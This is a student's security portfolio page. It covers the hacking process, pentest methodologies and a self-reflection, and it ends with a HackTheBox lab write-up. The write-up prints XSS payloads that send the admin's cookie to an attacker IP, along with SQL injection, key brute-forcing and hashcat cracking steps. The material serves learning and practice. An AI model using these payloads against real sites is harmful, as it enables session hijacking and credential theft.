          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
